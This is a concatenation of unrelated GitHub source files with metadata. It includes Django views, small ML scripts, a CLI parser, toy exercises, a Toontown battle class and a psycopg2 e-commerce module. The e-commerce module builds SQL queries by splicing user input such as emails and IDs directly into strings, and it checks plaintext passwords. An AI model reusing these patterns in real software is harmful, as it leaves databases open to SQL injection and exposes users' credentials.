\"action_status_button\")\n raise_exception = True\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def get_template_tag_args(self, context):\n args = super().get_template_tag_args(context)\n args.update(\n action=context[\"action\"],\n )\n return args\n\n def form_valid(self, form):\n self.object = form.save()\n\n # log if the action was changed\n if form.changed_data:\n changed_message = get_verbose_change_message(form=form)\n self.log_change(self.object, changed_message)\n\n return self.get_response()\n\n\nclass ActionDeleteView(\n ActionsEnabledMixin,\n LogMixin,\n LoginRequiredMixin,\n DeletionMixin,\n SingleObjectMixin,\n View,\n):\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n success_url = reverse_lazy(\"profile:action_list\")\n raise_exception = True\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def delete(self, request, *args, **kwargs):\n self.object = self.get_object()\n # soft-delete\n self.object.is_deleted = True\n self.object.save()\n\n self.on_delete_action(self.object)\n\n return HttpResponseRedirect(self.get_success_url())\n\n def on_delete_action(self, action):\n self.log_deletion(\n action,\n _(\"action soft-deleted by user {user}\").format(user=self.request.user),\n )\n messages.add_message(\n self.request,\n messages.SUCCESS,\n _(\"Actie '{action}' is verwijdered.\").format(action=action),\n )\n\n\nclass ActionCreateView(\n ActionsEnabledMixin,\n LogMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n CreateView,\n):\n template_name = \"pages/profile/actions/edit.html\"\n model = Action\n form_class = ActionForm\n success_url = reverse_lazy(\"profile:action_list\")\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n (\n _(\"Maak actie aan\"),\n reverse(\"profile:action_create\"),\n ),\n ]\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs.update(user=self.request.user)\n return kwargs\n\n def form_valid(self, form):\n self.object = form.save(self.request.user)\n\n self.log_addition(self.object, _(\"action was created\"))\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass ActionListExportView(\n ActionsEnabledMixin, LogMixin, LoginRequiredMixin, ExportMixin, ListView\n):\n template_name = \"export/profile/action_list_export.html\"\n model = Action\n\n def get_filename(self):\n return \"actions.pdf\"\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return (\n base_qs.visible()\n .filter(Q(is_for=self.request.user) | Q(created_by=self.request.user))\n .select_related(\"created_by\")\n )\n\n\nclass ActionExportView(\n ActionsEnabledMixin, LogMixin, LoginRequiredMixin, ExportMixin, DetailView\n):\n template_name = \"export/profile/action_export.html\"\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().filter(\n Q(is_for=self.request.user) | Q(created_by=self.request.user)\n )\n\n\nclass ActionPrivateMediaView(\n ActionsEnabledMixin, LogMixin, LoginRequiredMixin, PrivateMediaView\n):\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n file_field = \"file\"\n\n def get_queryset(self):\n return super().get_queryset().visible()\n\n def has_permission(self):\n action = self.get_object()\n if self.request.user.is_superuser or self.request.user in [\n action.created_by,\n action.is_for,\n ]:\n self.log_user_action(action, _(\"file was downloaded\"))\n return True\n\n return False\n\n\nclass ActionHistoryView(\n ActionsEnabledMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n DetailView,\n):\n template_name = \"pages/history.html\"\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n (\n _(\"History of {}\").format(self.object.name),\n reverse(\"profile:action_history\", kwargs=self.kwargs),\n ),\n ]\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[\"logs\"] = self.object.logs.order_by()\n return context\n","repo_name":"maykinmedia/open-inwoner","sub_path":"src/open_inwoner/accounts/views/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":10412,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"28573776698","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport itertools\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\nCOLUMNS = [\"Q1\", \"Q2\", \"Q3\", \"Q4\", \"Q5\", \"Q6\",\n \"Q7\", \"Q8\", \"Q9\", \"Q10\", \"gender\", \"age\", \"personality\"]\nFEATURES = [\"Q1\", \"Q2\", \"Q3\", \"Q4\", \"Q5\", \"Q6\",\n \"Q7\", \"Q8\", \"Q9\", \"Q10\", \"gender\", \"age\"]\nLABEL = \"personality\"\n\n\ndef input_fn(data_set):\n feature_cols = {k: tf.constant(data_set[k].values) for k in FEATURES}\n labels = tf.constant(data_set[LABEL].values)\n return feature_cols, labels\n\n\n\ndef main():\n # Load datasets\n training_set = pd.read_csv(\"training.csv\", skipinitialspace=True,\n skiprows=1, names=COLUMNS)\n test_set = pd.read_csv(\"test.csv\", skipinitialspace=True,\n skiprows=1, names=COLUMNS)\n\n\n # Passing user's input\n prediction_set = pd.read_csv(\"prediction.csv\", skipinitialspace=True,\n skiprows=1, names=COLUMNS)\n\n # Feature cols\n feature_cols = [tf.contrib.layers.real_valued_column(k)\n for k in FEATURES]\n\n # Build 2 layer fully connected DNN with 13, 13 units respectively.\n regressor = tf.contrib.learn.DNNRegressor(feature_columns=feature_cols,\n hidden_units=[13, 13],\n model_dir=\"trained_values/\")\n\n # Fit\n regressor.fit(input_fn=lambda: input_fn(training_set), steps=5000)\n\n\n # Score accuracy\n ev = regressor.evaluate(input_fn=lambda: input_fn(test_set), steps=1)\n loss_score = ev[\"loss\"]\n print(\"Loss: {0:f}\".format(loss_score))\n\n # Print out predictions\n y = regressor.predict(input_fn=lambda: input_fn(prediction_set))\n\n\n # .predict() returns an iterator; convert to a list and print predictions\n\n prediction = list(itertools.islice(y, 1))\n return prediction","repo_name":"SimuliChina/personalityclassification","sub_path":"personality.py","file_name":"personality.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"21407646373","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 17 09:22:57 2023\n\n@author: labo2023\n\"\"\"\n\nimport pandas as pd\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\nru = [0,50,100,200,300,400,500,750,1000,1250,1750]\ndi = [104,106,112.3,117,115.3,117.5,130.22,139.8,140.6,154.12,170.5]\n\ndi2 = [105.62,109,109.37,110.71,116.17,120.25,120.57,133.46,146.62,155.03,171.61]\n\ndatos = pd.DataFrame({'RU': ru, 'DI': di})\n\n\nx = pd.DataFrame(datos['RU'])\ny = pd.DataFrame(datos['DI'])\n\nmodel = linear_model.LinearRegression()\n\nmodel.fit(x,y)\n\nprint(model.coef_)\nprint(model.intercept_)\n\n\nplt.scatter(x,y,color='lightpink', marker='X')\nplt.plot(x, model.predict(x), color='crimson', linewidth=2)\nplt.xlabel('Dosis de RU (ug/huevo)')\nplt.ylabel('Indice de daño')\nplt.show()\n\n\ndata = pd.DataFrame({'RU': ru, 'DI': di2})\nx = pd.DataFrame(data['RU'])\ny = pd.DataFrame(data['DI'])\nmodel = linear_model.LinearRegression()\n\nmodel.fit(x,y)\npendiente = model.coef_\nordenada = model.intercept_\nR2 = model.score(x,y)\nprint(ordenada)\nprint(pendiente)\nprint(R2)\n\n\n","repo_name":"valenanton-26/labo-de-datos-1C2023","sub_path":"c-17.py","file_name":"c-17.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"5962214972","text":"import psycopg2\n\ndb = psycopg2.connect(host=[host], database=[dbproject], user=[userbd], password=[password_bd])\n\n\n\ndef queryDatos(user, contra):\n\n sql = \"SELECT * FROM clientes WHERE correo='\"+str(user)+\"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n\n email=row[6]\n contrasenia=row[7]\n\n if email == user and contrasenia == contra:\n return True\n else:\n return False\n\ndef existeuser(id):\n sql = \"select exists(select 1 from clientes where cedula='\"+str(id)+\"');\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n dato = row[0]\n\n\n return dato\n\n\n\ndef perfiluser(user):\n\n dato=0\n sql = \"SELECT * FROM clientes WHERE correo='\"+str(user)+\"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n dato = row[1]\n return dato\n\ndef nombreuser(user):\n\n sql = \"SELECT * FROM clientes WHERE correo='\" + str(user) + \"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n nombre = row[2]+\" \"+row[3]\n return nombre\n\ndef ciuser(user):\n\n sql = \"SELECT * FROM clientes WHERE correo='\" + str(user) + \"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n ci = row[0]\n return ci\n\ndef listaproductosg():\n\n sql = \"SELECT * FROM productos \"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\ndef mostrarproducto(id):\n\n sql = \"select * from productos where id_producto=\"+id\n\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n\n for row in data:\n cat = row[5]\n\n\n return data,cat\n\ndef mprodcat(categoria,id):\n\n sql = \"select * from productos where tipo='\" + str(categoria) + \"' and id_producto<>\"+id\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\n\ndef nuevocliente(cedula,nombre,apellido,telefono,direccion,correo,clave):\n try:\n sql=\"INSERT INTO CLIENTES (cedula,id_perfil,nombre,apellido,telefono,direccion,correo,clave) values \" \\\n \"('\"+str(cedula)+\"','1','\"+str(nombre)+\"','\"+str(apellido)+\"','\"+str(telefono)+\"','\"+str(direccion)+\"','\"+str(correo)+\"','\"+str(clave)+\"');\"\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n except:\n return False\n\n\ndef verprocompara(id):\n\n sql = \"SELECT nombreprod,caracteristicas,imagen FROM PRODUCTOS where id_producto=\"+id\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\ndef agcarrito(cedula,nite,idpro):\n\n try:\n sql = \"INSERT INTO carro (id_producto,cedula,cantidad) values \" \\\n \"('\" + str(idpro) + \"','\" + str(cedula) + \"','\" + str(nite) + \"');\"\n #print(sql)\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n\n except:\n return False\n\n\n\ndef visualcarrito(cedula):\n\n sql = \"SELECT CARRO.ID_CARRITO,PRODUCTOS.NOMBREPROD,PRODUCTOS.IMAGEN,CARRO.CANTIDAD,(PRODUCTOS.PRECIO*CARRO.CANTIDAD) \" \\\n \"AS SUBTOTAL FROM CARRO,PRODUCTOS WHERE CARRO.ID_PRODUCTO = PRODUCTOS.ID_PRODUCTO AND CARRO.CEDULA='\"+str(cedula)+\"';\"\n\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\ndef vsubtotal(cedula):\n sql = \"SELECT SUM(PRODUCTOS.PRECIO*CARRO.CANTIDAD) FROM CARRO,PRODUCTOS WHERE CARRO.ID_PRODUCTO = PRODUCTOS.ID_PRODUCTO AND CARRO.CEDULA='\" + str(\n cedula) + \"';\"\n\n cursor = db.cursor()\n cursor.execute(sql)\n data1 = cursor.fetchall()\n for row in data1:\n stotal = row[0]\n\n return stotal\n\ndef prodgoogle():\n\n sql=\"select * from productos where tipo='G'\"\n sql1 = \"select * from productos where tipo='A'\"\n sql2 = \"select * from productos where tipo='X'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n cursor1 = db.cursor()\n cursor1.execute(sql1)\n data1 = cursor1.fetchall()\n\n cursor2 = db.cursor()\n cursor2.execute(sql2)\n data2 = cursor2.fetchall()\n return data,data1,data2\n\n#######metodos para conteo ###############\n\ndef numerogeneralpro():\n\n sql = \"select count(*)as registros from productos;\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef numerogeneralprog():\n\n sql = \"select count(*)as registros from productos where tipo='G';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef numerogeneralproa():\n\n sql = \"select count(*)as registros from productos where tipo='A';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef numerogeneralprox():\n\n sql = \"select count(*)as registros from productos where tipo='X';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef cantidadcarrito(id):\n\n sql=\"SELECT count(*) from carro where cedula='\"+str(id)+\"';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\n\ndef eliminarcarrito(id,cedula):\n try:\n sql=\"delete from carro where id_carrito='\"+str(id)+\"' and cedula='\"+str(cedula)+\"';\"\n \n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n except:\n return False\n\n\ndef factura(cedula,nump,subtotal,total,fecha):\n\n try:\n sql = \"INSERT INTO factura (cedula,numproductos,subtotal,total,fecha) values \" \\\n \"('\" + str(cedula) + \"','\" + str(nump) + \"','\" + str(subtotal) + \"','\"+str(total)+\"','\"+str(fecha)+\"');\"\n print(sql)\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n\n except:\n return False\n\ndef carritoel(cedula):\n try:\n sql=\"delete from carro where cedula='\"+str(cedula)+\"'\"\n print(sql)\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n except:\n return False\n\n\ndef verfacturas(cedula):\n\n sql = \"SELECT * FROM FACTURA WHERE CEDULA='\"+str(cedula)+\"';\"\n print(\"visual\"+sql)\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\n\n#select * from factura where cedula='1234567890'\n\n","repo_name":"jonathanpastas/calidad_sw_tienda","sub_path":"bdatos.py","file_name":"bdatos.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13110096493","text":"import os\nimport sys\nimport argparse\nimport logging\nimport logging.handlers\nimport traceback\nimport importlib\n\n#--------------\n# local imports\n# -------------\n\nfrom azotea import __version__\nfrom azofits.utils import IMAGE_TYPES, SW_CREATORS, SW_MODIFIER, fits_image_type, fits_swcreator\n\nfrom azotea.utils.camera import BAYER_PTN_LIST\n\n\n# ----------------\n# Module constants\n# ----------------\n\nLOG_CHOICES = ('critical', 'error', 'warn', 'info', 'debug')\n\n# -----------------------\n# Module global variables\n# -----------------------\n\nlog = logging.getLogger('azoplot')\n\n# ----------\n# Exceptions\n# ----------\n\n\n# ------------------------\n# Module utility functions\n# ------------------------\n\ndef configureLogging(options):\n if options.verbose:\n level = logging.DEBUG\n elif options.quiet:\n level = logging.WARN\n else:\n level = logging.INFO\n \n log.setLevel(level)\n # Log formatter\n #fmt = logging.Formatter('%(asctime)s - %(name)s [%(levelname)s] %(message)s')\n fmt = logging.Formatter('%(asctime)s [%(levelname)s] %(message)s')\n # create console handler and set level to debug\n if options.console:\n ch = logging.StreamHandler()\n ch.setFormatter(fmt)\n ch.setLevel(level)\n log.addHandler(ch)\n # Create a file handler suitable for logrotate usage\n if options.log_file:\n #fh = logging.handlers.WatchedFileHandler(options.log_file)\n fh = logging.handlers.TimedRotatingFileHandler(options.log_file, when='midnight', interval=1, backupCount=365)\n fh.setFormatter(fmt)\n fh.setLevel(level)\n log.addHandler(fh)\n\ndef validfile(path):\n if not os.path.isfile(path):\n raise IOError(f\"Not valid or existing file: {path}\")\n return path\n\ndef validdir(path):\n if not os.path.isdir(path):\n raise IOError(f\"Not valid or existing directory: {path}\")\n return path\n\n \n# -----------------------\n# Module global functions\n# -----------------------\n\ndef createParser():\n # create the top-level parser\n name = os.path.split(os.path.dirname(sys.argv[0]))[-1]\n parser = argparse.ArgumentParser(prog=name, description='FITS batch editor for AZOTEA')\n\n # Global options\n parser.add_argument('--version', action='version', version='{0} {1}'.format(name, __version__))\n parser.add_argument('-c', '--console', action='store_true', help='log to console.')\n parser.add_argument('-l', '--log-file', type=str, default=None, action='store', metavar='', help='log to file')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-v', '--verbose', action='store_true', help='Verbose logging output.')\n group.add_argument('-q', '--quiet', action='store_true', help='Quiet logging output.')\n\n\n # --------------------------\n # Create first level parsers\n # --------------------------\n\n subparser = parser.add_subparsers(dest='command')\n\n parser_image = subparser.add_parser('image', help='image command')\n \n # ---------------------------------------\n # Create second level parsers for 'image'\n # ---------------------------------------\n\n subparser = parser_image.add_subparsers(dest='subcommand')\n iplot = subparser.add_parser('stats', help=\"Plot image stats\")\n group = iplot.add_mutually_exclusive_group(required=True)\n group.add_argument('-d', '--images-dir', type=validdir, action='store', metavar='', help='Images directory')\n group.add_argument('-f', '--image-file', type=validfile, action='store', metavar='', help='single FITS file path') \n iplot.add_argument('-x','--width', type=int, default=500, help=\"Region of interest width [pixels].\")\n iplot.add_argument('-y','--height', type=int, default=400, help=\"Region of interest height [pixels].\")\n iplot.add_argument('--x0', type=int, default=None, help=\"Region of interest X origin [pixels].\")\n iplot.add_argument('--y0', type=int, default=None, help=\"Region of interest Y height [pixels].\")\n iplot.add_argument('-b','--bayer', choices=BAYER_PTN_LIST, default=None, help='Bayer pattern layout')\n iplot.add_argument('--vmin', type=int, default=None, help='minumim pixel value to display')\n iplot.add_argument('--vmax', type=int, default=None, help='maximum pixel value to display')\n iplot.add_argument('--plot-sigma', type=int, choices=range(1,6), default=2, help='# of sigmas when autoscaling')\n\n return parser\n\n \n\n# ================ #\n# MAIN ENTRY POINT #\n# ================ #\n\ndef main():\n '''\n Utility entry point\n '''\n try:\n options = createParser().parse_args(sys.argv[1:])\n configureLogging(options)\n name = os.path.split(os.path.dirname(sys.argv[0]))[-1]\n log.info(f\"============== {name} {__version__} ==============\")\n package = f\"{name}\"\n command = f\"{options.command}\"\n subcommand = f\"{options.subcommand}\"\n try: \n command = importlib.import_module(command, package=package)\n except ModuleNotFoundError: # when debugging module in git source tree ...\n command = f\".{options.command}\"\n command = importlib.import_module(command, package=package)\n getattr(command, subcommand)(options)\n except KeyboardInterrupt as e:\n log.critical(\"[%s] Interrupted by user \", __name__)\n except Exception as e:\n traceback.print_exc()\n log.critical(\"[%s] Fatal error => %s\", __name__, str(e) )\n finally:\n pass\n\nmain()\n","repo_name":"actionprojecteu/azotea-client","sub_path":"src/azoplot/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"70432454676","text":"'''\n우선순위 오름차순\n(\n+-\n*/\n)\n이다.\n우선순위 낮은 연산자를 만날 때까지 pop을 하면서 출력을 하면 된다.\n'''\n\nd = {\n ')': 0,\n '(': 1,\n '+': 2,\n '-': 2,\n '*': 3,\n '/': 3,\n}\npre = input() + ')'\nst = ['(']\nr = []\nfor s in pre:\n if s != '(':\n while st and d.get(st[-1], 4) >= d.get(s, 4):\n tmp = st.pop()\n if tmp != '(':\n r.append(tmp)\n else:\n break\n if s != ')':\n st.append(s)\n\nprint(''.join(r))","repo_name":"PyeongGang-Kim/TIL","sub_path":"algorithm/백준/1918.py","file_name":"1918.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4930064666","text":"matches = {} #first output\ntotal_scores = [] #second output\nplscr = {} #stores player scores temporarily.\nfor _ in range(int(input())):\n match_name = input().split(':',) #match_name[0] is the match's name.\n matches[match_name[0]] = {}\n temp1 = match_name[1].split(',') #stores '-' seperated player name,score temporarily.\n for j in range(len(temp1)):\n temp2 = temp1[j].split('-') #temp2[0] is player name and [1] is score.\n matches[match_name[0]][temp2[0]] = temp2[1] #store score in nested dictionary.\n if temp2[0] in plscr: #add to previous score or create new player.\n plscr[temp2[0]] += int(temp2[1])\n else:\n plscr[temp2[0]] = int(temp2[1]) \n\nfor pl, sc in plscr.items(): #form a list of tuples of keys and indexes.\n total_scores.append((pl,sc)) \n \nprint(matches)\nprint(total_scores)\n","repo_name":"MananKGarg/SOC_20_Virtual_Keyboard","sub_path":"Assignment 1/Team 5/Jeff_Problem_1.py","file_name":"Jeff_Problem_1.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"84"} +{"seq_id":"41423145509","text":"VOWELS = ('a', 'e', 'i', 'o', 'u', 'yt', 'xr')\n\nCONSONANTS = ('b', 'c', 'd', 'f', 'g',\n 'h', 'j', 'k', 'l', 'm',\n 'n', 'p', 'q', 'r', 's',\n 't', 'v', 'w', 'x', 'y',\n 'z', 'sh', 'sch', 'zz', 'gh',\n 'ch', 'th', 'qu', 'thr',\n 'squ')\n\n\ndef translate(sentence):\n result = []\n for word in sentence.split(' '):\n if word[:3] in CONSONANTS:\n word = word[3:] + word[:3]\n elif word[:2] in CONSONANTS:\n word = word[2:] + word[:2]\n elif word[0] in CONSONANTS and word[:2] not in VOWELS:\n word = word[1:] + word[0]\n\n result.append(word + 'ay')\n return \" \".join(result)\n","repo_name":"j-mak/python3-exercism.io","sub_path":"pig-latin/pig_latin.py","file_name":"pig_latin.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"24112548969","text":"from toontown.toonbase.ToontownBattleGlobals import *\nfrom .BattleBase import *\nfrom direct.interval.IntervalGlobal import *\nfrom direct.showbase import DirectObject\nfrom . import MovieFire\nfrom . import MovieSOS\nfrom . import MovieNPCSOS\nfrom . import MoviePetSOS\nfrom . import MovieHeal\nfrom . import MovieTrap\nfrom . import MovieLure\nfrom . import MovieSound\nfrom . import MovieThrow\nfrom . import MovieSquirt\nfrom . import MovieDrop\nfrom . import MovieSuitAttacks\nfrom . import MovieToonVictory\nfrom . import PlayByPlayText\nfrom . import BattleParticles\nfrom toontown.distributed import DelayDelete\nfrom . import BattleExperience\nfrom .SuitBattleGlobals import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom . import RewardPanel\nimport random\nfrom . import MovieUtil\nfrom toontown.toon import Toon\nfrom toontown.toonbase import ToontownGlobals\nfrom toontown.toontowngui import TTDialog\nimport copy\nimport functools\nfrom toontown.toonbase import TTLocalizer\nfrom toontown.toon import NPCToons\ncamPos = Point3(14, 0, 10)\ncamHpr = Vec3(89, -30, 0)\nrandomBattleTimestamp = base.config.GetBool('random-battle-timestamp', 0)\n\nclass Movie(DirectObject.DirectObject):\n notify = DirectNotifyGlobal.directNotify.newCategory('Movie')\n\n def __init__(self, battle):\n self.battle = battle\n self.track = None\n self.rewardPanel = None\n self.rewardCallback = None\n self.playByPlayText = PlayByPlayText.PlayByPlayText()\n self.playByPlayText.hide()\n self.renderProps = []\n self.hasBeenReset = 0\n self.reset()\n self.rewardHasBeenReset = 0\n self.resetReward()\n return\n\n def cleanup(self):\n self.reset()\n self.resetReward()\n self.battle = None\n if self.playByPlayText != None:\n self.playByPlayText.cleanup()\n self.playByPlayText = None\n if self.rewardPanel != None:\n self.rewardPanel.cleanup()\n self.rewardPanel = None\n self.rewardCallback = None\n return\n\n def needRestoreColor(self):\n self.restoreColor = 1\n\n def clearRestoreColor(self):\n self.restoreColor = 0\n\n def needRestoreHips(self):\n self.restoreHips = 1\n\n def clearRestoreHips(self):\n self.restoreHips = 0\n\n def needRestoreHeadScale(self):\n self.restoreHeadScale = 1\n\n def clearRestoreHeadScale(self):\n self.restoreHeadScale = 0\n\n def needRestoreToonScale(self):\n self.restoreToonScale = 1\n\n def clearRestoreToonScale(self):\n self.restoreToonScale = 0\n\n def needRestoreParticleEffect(self, effect):\n self.specialParticleEffects.append(effect)\n\n def clearRestoreParticleEffect(self, effect):\n if self.specialParticleEffects.count(effect) > 0:\n self.specialParticleEffects.remove(effect)\n\n def needRestoreRenderProp(self, prop):\n self.renderProps.append(prop)\n\n def clearRenderProp(self, prop):\n if self.renderProps.count(prop) > 0:\n self.renderProps.remove(prop)\n\n def restore(self):\n return\n for toon in self.battle.activeToons:\n toon.loop('neutral')\n origPos, origHpr = self.battle.getActorPosHpr(toon)\n toon.setPosHpr(self.battle, origPos, origHpr)\n hands = toon.getRightHands()[:]\n hands += toon.getLeftHands()\n for hand in hands:\n props = hand.getChildren()\n for prop in props:\n if prop.getName() != 'book':\n MovieUtil.removeProp(prop)\n\n if self.restoreColor == 1:\n headParts = toon.getHeadParts()\n torsoParts = toon.getTorsoParts()\n legsParts = toon.getLegsParts()\n partsList = [headParts, torsoParts, legsParts]\n for parts in partsList:\n for partNum in range(0, parts.getNumPaths()):\n nextPart = parts.getPath(partNum)\n nextPart.clearColorScale()\n nextPart.clearTransparency()\n\n if self.restoreHips == 1:\n parts = toon.getHipsParts()\n for partNum in range(0, parts.getNumPaths()):\n nextPart = parts.getPath(partNum)\n props = nextPart.getChildren()\n for prop in props:\n if prop.getName() == 'redtape-tube.egg':\n MovieUtil.removeProp(prop)\n\n if self.restoreHeadScale == 1:\n headScale = ToontownGlobals.toonHeadScales[toon.style.getAnimal()]\n for lod in toon.getLODNames():\n toon.getPart('head', lod).setScale(headScale)\n\n if self.restoreToonScale == 1:\n toon.setScale(1)\n headParts = toon.getHeadParts()\n for partNum in range(0, headParts.getNumPaths()):\n part = headParts.getPath(partNum)\n part.setHpr(0, 0, 0)\n part.setPos(0, 0, 0)\n\n arms = toon.findAllMatches('**/arms')\n sleeves = toon.findAllMatches('**/sleeves')\n hands = toon.findAllMatches('**/hands')\n for partNum in range(0, arms.getNumPaths()):\n armPart = arms.getPath(partNum)\n sleevePart = sleeves.getPath(partNum)\n handsPart = hands.getPath(partNum)\n armPart.setHpr(0, 0, 0)\n sleevePart.setHpr(0, 0, 0)\n handsPart.setHpr(0, 0, 0)\n\n for suit in self.battle.activeSuits:\n if suit._Actor__animControlDict != None:\n suit.loop('neutral')\n suit.battleTrapIsFresh = 0\n origPos, origHpr = self.battle.getActorPosHpr(suit)\n suit.setPosHpr(self.battle, origPos, origHpr)\n hands = [suit.getRightHand(), suit.getLeftHand()]\n for hand in hands:\n props = hand.getChildren()\n for prop in props:\n MovieUtil.removeProp(prop)\n\n for effect in self.specialParticleEffects:\n if effect != None:\n effect.cleanup()\n\n self.specialParticleEffects = []\n for prop in self.renderProps:\n MovieUtil.removeProp(prop)\n\n self.renderProps = []\n return\n\n def _deleteTrack(self):\n if self.track:\n DelayDelete.cleanupDelayDeletes(self.track)\n self.track = None\n return\n\n def reset(self, finish = 0):\n if self.hasBeenReset == 1:\n return\n self.hasBeenReset = 1\n self.stop()\n self._deleteTrack()\n if finish == 1:\n self.restore()\n self.toonAttackDicts = []\n self.suitAttackDicts = []\n self.restoreColor = 0\n self.restoreHips = 0\n self.restoreHeadScale = 0\n self.restoreToonScale = 0\n self.specialParticleEffects = []\n for prop in self.renderProps:\n MovieUtil.removeProp(prop)\n\n self.renderProps = []\n\n def resetReward(self, finish = 0):\n if self.rewardHasBeenReset == 1:\n return\n self.rewardHasBeenReset = 1\n self.stop()\n self._deleteTrack()\n if finish == 1:\n self.restore()\n self.toonRewardDicts = []\n if self.rewardPanel != None:\n self.rewardPanel.destroy()\n self.rewardPanel = None\n return\n\n def play(self, ts, callback):\n self.hasBeenReset = 0\n ptrack = Sequence()\n camtrack = Sequence()\n if random.random() > 0.5:\n MovieUtil.shotDirection = 'left'\n else:\n MovieUtil.shotDirection = 'right'\n for s in self.battle.activeSuits:\n s.battleTrapIsFresh = 0\n\n tattacks, tcam = self.__doToonAttacks()\n if tattacks:\n ptrack.append(tattacks)\n camtrack.append(tcam)\n sattacks, scam = self.__doSuitAttacks()\n if sattacks:\n ptrack.append(sattacks)\n camtrack.append(scam)\n ptrack.append(Func(callback))\n self._deleteTrack()\n self.track = Sequence(ptrack, name='movie-track-%d' % self.battle.doId)\n if self.battle.localToonPendingOrActive():\n self.track = Parallel(self.track, Sequence(camtrack), name='movie-track-with-cam-%d' % self.battle.doId)\n if randomBattleTimestamp == 1:\n randNum = random.randint(0, 99)\n dur = self.track.getDuration()\n ts = float(randNum) / 100.0 * dur\n self.track.delayDeletes = []\n for suit in self.battle.suits:\n self.track.delayDeletes.append(DelayDelete.DelayDelete(suit, 'Movie.play'))\n\n for toon in self.battle.toons:\n self.track.delayDeletes.append(DelayDelete.DelayDelete(toon, 'Movie.play'))\n\n self.track.start(ts)\n return None\n\n def finish(self):\n self.track.finish()\n return None\n\n def playReward(self, ts, name, callback, noSkip = False):\n self.rewardHasBeenReset = 0\n ptrack = Sequence()\n camtrack = Sequence()\n self.rewardPanel = RewardPanel.RewardPanel(name)\n self.rewardPanel.hide()\n victory, camVictory, skipper = 